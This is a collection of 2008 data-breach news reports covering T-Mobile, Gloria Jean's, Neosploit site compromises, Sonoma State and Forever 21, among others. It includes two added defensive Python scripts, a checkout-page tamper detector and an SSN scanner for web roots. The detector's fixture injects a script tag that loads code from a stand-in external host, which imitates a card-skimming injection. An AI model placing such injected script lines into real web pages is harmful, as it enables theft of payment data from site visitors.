In 2006, 17 million German customer records were stolen from T-Mobile, a mobile network operator headquartered in Bonn, Germany. T-Mobile has admitted the incident; the stolen customer records included names, addresses, phone numbers, dates of birth and email addresses.
Silent about the data loss for more than two years, the company published its version of events on Saturday following a report in German news magazine Der Spiegel that the data were being offered for sale on the Internet. When the loss of the disk was discovered, the company reported the loss to the state prosecutor, and began monitoring Internet forums and sites where such stolen information is offered for sale.
The records included secret addresses of politicians, an ex-federal president, celebrities and others likely to be at risk from having their contact details released. No bank details were included in the stolen data.
The company said a storage device containing the files “is in the hands of unknown parties”. T-Mobile’s parent, Deutsche Telekom, said it had no evidence that the records had been used since 2006. Although the records had been offered for sale online, no one had bought them. The data for sale includes the home addresses and unlisted phone numbers of many German celebrities, business leaders, billionaires, religious representatives, government ministers and politicians. German regulators are investigating the incident.
The company said it had made every effort to get the data back and has improved procedures to stop a similar theft happening again. Deutsche Telekom apologized for the loss and has set up a hotline to deal with worried customers.
Earlier this month, the gloriajeans.com website was the subject of an attack that allowed an unknown person or persons to obtain the addresses and credit card numbers of 511 customers as they were placing orders on the site. According to the New Hampshire State Attorney General, Gloria Jeans Coffee (Gloria Jean’s) recently experienced a data security breach in its e-commerce site hosted by Smith Micro, Inc.
The personal information affected may include customer names, addresses, telephone numbers, emails, and credit card information. Gloria Jean’s has not determined that any fraudulent credit card transaction has occurred as a result of this incident. Since Social Security Numbers and other financial account information are not collected, the attacker accessed only credit card numbers, names and addresses.
A full analysis of the e-commerce server files revealed that on September 4th, 2008, an individual initiated modifications to checkout web pages from a shared IP address located in the United States. On September 10, 2008, the intrusion was identified and it was clear that the modifications were able to access and screen capture the personal transaction information and dump it to an external server and log file. The encrypted database was not exposed to this intrusion.
Once discovered, Gloria Jean’s immediately took its website offline and confirmed that no malicious or unauthorized code remained as part of its website before returning the site to service. They also contacted the host of the server holding the intruder’s log file of consumer information to have the IP address disabled and made inaccessible. The incident was reported to the United States Secret Service Electronic Crimes Task Force (ECTF) and a notice was sent to affected customers by U.S. First Class mail and email.
Gloria Jean’s investigation of this incident is ongoing in cooperation with its initial report and provision of materials to a representative from the ECTF.
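A defender-side check for the kind of checkout-page tampering described above, added here as an example and not code from Gloria Jean’s or Smith Micro: it baselines a hash of each known-good page, reports pages whose content has changed, and lists any script or form destination on a changed page that points off-site. The host names, paths and the injected tag are constructed.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample: a clean checkout page, and the same page after an
# injected script tag that loads code from an external host (TEST-NET address).
CLEAN_CHECKOUT = """<html><body>
<form id="checkout" action="/checkout/submit" method="post">
<input name="card_number"><input name="card_exp"></form>
<script src="/static/checkout.js"></script>
</body></html>"""

TAMPERED_CHECKOUT = CLEAN_CHECKOUT.replace(
    "</body>", '<script src="http://198.51.100.23/c.js"></script></body>')

# Hosts that checkout pages are allowed to reference (assumed for the example).
ALLOWED_HOSTS = {"gloriajeans.com", "www.gloriajeans.com"}
REF_RE = re.compile(r'(?:src|action)\s*=\s*["\']([^"\']+)["\']', re.I)


def sha256_baseline(pages):
    """Record a SHA-256 of each page while the site is known to be clean."""
    return {path: hashlib.sha256(body.encode()).hexdigest()
            for path, body in pages.items()}


def changed_pages(baseline, pages):
    """Return the paths whose current content no longer matches the baseline."""
    return sorted(path for path, body in pages.items()
                  if hashlib.sha256(body.encode()).hexdigest() != baseline.get(path))


def external_refs(body, allowed_hosts=ALLOWED_HOSTS):
    """List script sources and form actions that resolve to a host outside the allow-list.
    Relative URLs have no host and are treated as on-site."""
    hits = []
    for url in REF_RE.findall(body):
        host = urlparse(url).hostname
        if host and host.lower() not in allowed_hosts:
            hits.append(url)
    return hits


def audit(baseline, pages):
    """Map each changed page to the off-site destinations found in its new content."""
    return {path: external_refs(pages[path]) for path in changed_pages(baseline, pages)}


if __name__ == "__main__":
    baseline = sha256_baseline({"/checkout.html": CLEAN_CHECKOUT})
    print(audit(baseline, {"/checkout.html": TAMPERED_CHECKOUT}))
```

Run the baseline step from a clean deployment and the audit step on a schedule; a changed page with an empty off-site list still deserves a look, since an exfiltration endpoint can also be hidden inside a script body rather than a tag attribute.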
According to Ian Amit, director of security research at Aladdin Knowledge Systems, cybercriminals have used the latest version of Neosploit to booby-trap an estimated 80,000 legitimate sites with malicious code. Victims of the attack include government sites, Fortune 500 companies, and a weapons manufacturing firm. Victims also included the US Postal Service, which has since cleaned up its act.
Amit uncovered the assault while researching the newly released Neosploit 3.1 hacker toolkit. During his research, he discovered login credentials for more than 200,000 servers on a server used by cybercrooks. These credentials included BBC login details, fortunately unconnected to the corporation’s news or content sites.
Analysis by Amit and his team at Aladdin suggests that at least three gangs were involved in collecting the list and that 80,000 of these sites had been loaded with malicious code by hackers as part of an attempt to infect visiting surfers through drive-by download attacks. Organizations in 86 countries are said to be affected. Amit identified the affected organizations after examining server logs.
“Out of the 200,000 credentials, nearly 107,000 were validated by the criminal server, and of which, almost 82,000 were used to modify Web related content in order to attack the users of the associated sites,” a statement by Aladdin explains.
After closer investigation of the data gathered during the research, it came to light that the criminals had also obtained credentials for the BBC site ftp.bbc.co.uk. If not for the sheer luck that the credentials were not associated with any online material, this incident could have ended up infecting the BBC’s website visitors.
Additionally, reputable universities such as the University of Bradford, a travel agency (easytravelgroup.co.uk), and of course a lot of internet providers and hosting companies were affected. Aladdin is working with CERT and law enforcement agencies worldwide to inform affected organizations about the compromise to their websites.
Incidents where legitimate websites are compromised with malicious code using tactics such as SQL injection attacks have reached epidemic proportions over recent months. The compromises unearthed by Aladdin join a growing list of assaults and victims. Previous targets have included the government of the City and County of San Francisco, Microsoft acquisition target atmdt.com, BMW in Mexico, Hackney Council, and BusinessWeek.com. Tools such as the Asprox attack toolkit have featured as part and parcel of these previous attacks.
Foothills Park & Recreation District in South Jefferson County is working with the Jefferson County Sheriff’s Office in the investigation of a theft of personal information from the district’s computer network. The information was accessed through illegal hacking and could contain credit card information and other personal information that could be used to commit identity theft.
If information has, in fact, been stolen, it appears to be credit card information for individuals who have registered for classes either online at www.ifoothills.org or at one of Foothills Park & Recreation District’s facilities.
Foothills Executive Director Ronald Hopp said, “It is very disturbing that despite the security measures that were in effect, a rogue hacker was still successful in obtaining this information. Additional protections are being installed, and on-line registration will not be available until these measures are implemented.”
Hopp said that they started having trouble with the Web site last week. Originally the problem seemed to be a virus, but they now believe it was a cover for someone to hack the site and steal personal information. Technical staff discovered Monday morning that the files were compromised and possibly stolen; the number of people affected would be “very significant.”
The district has hired a network security consultant who will be auditing the systems and making recommendations for future security measures, and all internal systems and processes are being reviewed in an effort to eliminate the possibility of this happening again.
Individual patrons whose information may have been compromised will be notified by Foothills Park & Recreation District directly and provided with additional information. The district has created an information page on its website (www.ifoothills.org/securityalert/) for individuals who are concerned that their information may have been on the network. In addition, the district has set up a special number at (303) 409-2124 to answer specific questions not addressed on the website.
SophosLabs reports an unusual bank phishing spam campaign in which a particular image phish targets the Italian bank Poste Italiane. The phishing email itself (in Italian) entices users to follow the link in order to receive 250 Euros worth of “loyalty bonus”. This scheme is fairly typical, and the link in the message goes to a compromised domain controlled by the phisher. Instead of hosting the phish on this compromised domain, an HTTP redirect is used to send the user to a second domain, where the phish page resides.
What’s unusual is that the domain hosting the phishing page, fjsb.com, seems to be owned by Fort Jennings State Bank, a private, local bank serving the state of Ohio. The site’s design was a throwback to the early days of HTML and the site itself does not have many of the features most bank sites use today. The domain WHOIS confirms the ownership of the domain:
Domain Name: FJSB.COM
Registrant:
The Fort Jennings State Bank
PO Box 186
120 N Water Street
Fort Jennings, OH 45844-0186
US

Administrative Contact:
Edelbrock, Mark
FJSB
302 DELPHOS RD
COLUMBUS GRV, OH 45830-9201
US
(419) 659-2527 fax: (419) 659-2509

Technical Contact:
Burkhart, Tim
North West Net, Inc.
PO BOX 159
FORT JENNINGS, OH 45844-0159
US
419-286-3346 fax: 419-286-5345

Record expires on 30-Mar-2013.
Record created on 29-Mar-1997.

So a bank in the US was hosting a phishing site aimed at the customers of an Italian bank. This just shows that all sites (even bank or military sites) may be compromised and used for malicious purposes, such as a phish campaign in this case, or to infect visitors with malware in other cases. The phishing site has since been taken down, and the compromised site linked directly from the phish message itself now redirects to another compromised site.
In a breach notification letter sent to the New Hampshire State Attorney General, PSS World Medical states that the company “recently became aware of an incident involving unauthorized access” to the company’s career board website. The unauthorized access resulted in the exposure of personal information belonging to job applicants and others who may have posted their information on the site. No additional details were disclosed by PSS World Medical.
The event may have resulted in unauthorized access to certain personal information such as name, address, date of birth, driver’s license number and Social Security number of certain individuals who posted their information to the career board website. While personal information may have been accessed, there is no evidence that any information has been obtained or misused.
Concerned users can call toll-free at (866) 371-2502, Monday through Friday, between 9:00 AM and 5:00 PM Eastern. Free credit monitoring will be provided to the affected persons, although it is not clear for how long.
A breach at Sonoma State University exposed the Social Security numbers of about 600 former computer science students, which had been stored on an internal department Web server. Though acknowledging the risk of identity theft, university officials said they were not aware of any criminal or inappropriate activity linked to the slip-up, which was discovered Sept. 2.
A former student accessed the roster of names and Social Security numbers through a networking site opened about six months earlier for people previously enrolled in computer science classes, SSU spokeswoman Susan Kashak said.
The Web site was closed to anyone but certain students, and the roster, though stored on the department server, was not directly linked to the site, university officials said.
The student apparently found the data using a Web crawler to search for odds and ends, they said. “Somehow that data inadvertently got accessible from the Web page,” officials said. “There were no links to it so you would ‘Click here to a list of alums’ or anything like that.“
There were no indications that anyone else saw the list or accessed the data for ulterior purposes. It was expunged as soon as the student who found it brought it to officials’ attention.
The file contained only names and Social Security numbers, so no other personal, confidential information was compromised, officials said. Affected students have nonetheless been advised to check their credit reports to make sure their information is not being used.
The security breach pales compared with a 2005 episode in which hackers gained access to seven campus workstations, exposing the names and Social Security numbers of 61,709 people who had applied to, attended or graduated from SSU from 1995 to 2002, the university said. Faculty data from 1999 to 2005 also was compromised in the hacking incident, though it did not appear any of the personal information was accessed or abused.
The Social Security numbers at issue this fall were improperly stored on a department server outside the management of SSU’s central information technology system and kept against university policy. Current rules prevent anyone on campus from having computer files with Social Security numbers absent specific permission. Social Security numbers were used to identify students before student identification numbers came into use, however.
A recent assessment of SSU’s information systems called for improved oversight of the independently managed computers and servers such as that containing the compromised data.
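The SSU incident is the classic case of a sensitive file sitting unlinked under a document root until a crawler finds it. One way to enforce the policy described above, added here as an example and not SSU’s own tooling: walk a web root, read text-like files, and report any that contain formatted SSNs, skipping area, group and serial values that are never issued. The sample directory tree and the numbers in it are constructed.

```python
import os
import re
import tempfile

# Formatted SSNs only (AAA-GG-SSSS). Area 000, 666 and 9xx, group 00 and
# serial 0000 are never issued, so they are excluded to reduce false positives.
SSN_RE = re.compile(r"(?<!\d)(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}(?!\d)")
TEXT_EXTS = {".txt", ".csv", ".tsv", ".htm", ".html", ".xml", ".json"}


def count_ssns(text):
    """Number of SSN-looking values in a piece of text."""
    return len(SSN_RE.findall(text))


def scan_web_root(root, min_hits=1):
    """Walk a document root and report text files containing SSN-like values.
    Returns a sorted list of (path relative to root, hit count). Anything under
    the web root is a candidate, linked from a page or not."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in TEXT_EXTS:
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    hits = count_ssns(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if hits >= min_hits:
                findings.append((os.path.relpath(full, root), hits))
    return sorted(findings)


def build_sample_root():
    """Constructed sample: an alumni site with an unlinked roster left in the web root."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "alumni"))
    with open(os.path.join(root, "alumni", "index.html"), "w") as fh:
        fh.write("<h1>CS alumni</h1><p>No roster is linked from here.</p>")
    with open(os.path.join(root, "alumni", "roster_2002.csv"), "w") as fh:
        fh.write("name,ssn\nA. Student,123-45-6789\nB. Student,321-54-9876\n")
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("Phone 707-664-2000 is not an SSN: the middle group has three digits.")
    return root


if __name__ == "__main__":
    for rel_path, hits in scan_web_root(build_sample_root()):
        print(f"{rel_path}: {hits} SSN-like values")
```

Bare nine-digit runs are deliberately ignored here; widen the pattern only with a second check (context words such as “SSN”), or the sweep drowns in phone numbers and IDs.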
Unknown intruders have hacked the website of conservative commentator Bill O’Reilly and posted personal details of more than 200 of its subscribers. The breach into BillOreilly.com came as retaliation for remarks O’Reilly made on FoxNews condemning the attack on Palin’s Yahoo email account, according to Wikileaks, a site that makes it easy for hackers and anyone else to leak documents. BillOreilly.com charges $4.95 for monthly premium membership. The O’Reilly Store sells hats, mugs, T-shirts and other merchandise.
As proof, Wikileaks posted a screenshot of the BillOreilly.com administrative interface that showed the names, email addresses, passwords, and home town of 20 subscribers of the website. In all, information belonging to 205 subscribers was intercepted, according to Eric Marston, CTO of Nox Solutions, the company that maintained the O’Reilly website.
The hack came in response to comments O’Reilly made on Fox News about the posting of contents of Palin’s email account, including pictures of her daughter and her contact list. The hackers were able to access the unsecured list by trying a large number of variations of the website’s administrative URL. All affected members have received an email and a phone call informing them of the breach and urging them to change their password anywhere they may have used it. No credit card information was stolen, and the site has since been completely locked down.
“I’m not going to mention the website that posted this, but it’s one of those despicable, slimy, scummy websites,” O’Reilly said, according to this snippet from YouTube. “Everybody knows where this stuff is, OK, and they know the people who run the website, so why can’t they go there tonight to the guy’s house who runs it, put him in cuffs and take him down and book him?”
It’s evident from the remark that no one bothered to tell O’Reilly that Wikileaks, the first site to publish the Palin email, is a multi-national, bulletproof organization that has successfully withstood serious take-down efforts before. While the information exposed on Wikileaks may seem minimal, it has the potential to imperil the BillOreilly.com subscribers listed in ways they may not have anticipated.
The website for the Texas National Guard remained unreachable on Friday, two days after security researchers said it had been hacked by miscreants who were using it to install malware on visitors’ PCs. Some pages on the website were probably SQL injected.
On Wednesday, Roger Thompson, chief research officer of anti-virus provider AVG, reported that selected pages on the site were attempting to install a rootkit on machines that were not fully patched. The ruse starts by silently redirecting visitors to a site called add-block-plus.net, which in turn bounces visitors to several other sites.
The attack comes as the Texas National Guard responds to Hurricane Ike, which earlier this week ravaged the gulf coast of Texas. Someone answering the guard’s public affairs line said the person responsible for the website was busy with relief efforts.
Not only has Texas been hammered by the hurricane, but the people who are probably helping out the most have been hacked as well. Now the Texas National Guard needs to find out how the bad guys got in and then fix the flaw, which will most likely show up on other government-related websites. According to Sophos researchers, the Texas National Guard is only one of many sites to be hit in the attack. The malware residing on the site is detected as Mal/ObfJS-A.
Payment cards used by customers of several Forever 21 Inc. retail stores may have been compromised in a series of data thefts dating back to August 2004. Forever 21, a discount retailer based in Los Angeles, was notified by the U.S. Department of Justice in Boston on Aug. 5. There was no explanation for why the company waited more than a month after it discovered the compromise to notify affected customers about it. Forever 21 discovered the thefts only after being notified of them by the Department of Justice, according to a statement released last week and posted on the discount retailer’s Web site.
The Department of Justice (DOJ) last month filed indictments against three people who allegedly hacked into computer systems belonging to 12 retailers to steal payment card data, including a much-publicized breach at TJX Companies. Forever 21 said it was notified by the DOJ that it was one of the victims of those attacks and was given a disk containing “potentially compromised file data.”
A subsequent forensic analysis revealed that transaction data for approximately 98,930 credit and debit card numbers had been illegally accessed, with more than 20,000 of the transactions made at the company’s Fresno store. The company’s investigations indicated that the intrusions affected customers who shopped at the company’s stores on nine specific dates. The first intrusion dated back to March 25, 2004, and the most recent occurred Aug. 14, 2007.
The compromised data included credit and debit cards, expiration dates “and other card data,” but did not include customer names or addresses. More than half of the compromised payment cards are either inactive or have expired, the company said. The company offered no details on what other data might have been compromised, and it was not clear whether all nine of the data theft incidents resulted from a single intrusion or whether the company’s systems were broken into nine separate times.
Forever 21 stressed that it has complied with the requirements of the credit card industry’s Payment Card Industry Data Security Standards (PCI DSS) since they went into effect. And it noted it has been certified as being PCI-compliant since 2007. It was not immediately clear whether that compliance was achieved before or after August 2007, when four of the illegal data access incidents took place.
The incidents cited by Forever 21 appear linked to the early August arrests of 11 people on credit card fraud-related charges. They are believed responsible for a series of data heists at 12 major retailers, including TJX Companies Inc., Forever 21, BJ’s Wholesale Club Inc., DSW Inc., OfficeMax Inc., Barnes & Noble and Sports Authority.